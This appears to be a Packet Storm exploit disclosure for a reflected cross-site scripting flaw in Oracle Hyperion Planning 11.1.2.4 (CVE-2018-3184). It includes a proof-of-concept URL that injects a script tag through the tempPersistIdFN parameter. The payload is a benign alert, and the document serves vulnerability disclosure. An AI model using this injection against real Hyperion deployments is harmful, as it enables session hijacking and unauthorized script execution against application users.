Oracle Hyperion Planning version 11.1.2.4 suffers from a cross site scripting vulnerability.
f1e4246f1facceb265fb6db192bb8778e2c6cf895f1800708a650565fa3c0b4f# Exploit Title: Oracle Hyperion Planning, 11.1.2.4 Vulnerable to Cross Site Scripting
# Date: 2018-10-16
# Exploit Author: Hasan Alqawzai
# Vendor Homepage: https://www.oracle.com
# Software Link: https://www.oracle.com/applications/performance-management/products/financial-close-reporting/hyperion-financial-management/
# Version: 11.1.2.4
# Tested on: Windows
# CVE : CVE-2018-3184
# Description :
It was detected cross-site scripting , which allows an attacker to execute a dynamic script in the context of the application.
# Prerequisites :
Access to Oracle Hyperion
# PoC Exploit: XSS
https://examble.com/raframework/browse/editFileACL?dest=0000016f77a61591-1111-3dfd-c9ao0p1b&tempPersistIdFN=1525";</script><script>alert(/hasan/)</script>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed